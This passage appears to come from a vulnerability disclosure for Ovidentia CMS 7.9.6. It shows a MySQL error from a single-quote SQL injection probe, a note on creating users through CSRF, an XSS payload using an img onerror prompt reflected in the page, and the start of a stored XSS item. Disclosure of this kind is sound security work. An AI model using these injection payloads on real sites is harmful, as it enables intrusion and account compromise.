style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.
[2]CSRF vulnerability
log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.
<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a>
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->
[4]Stored xss
log into the admin portal and access mail functionlity and create new
domain using link below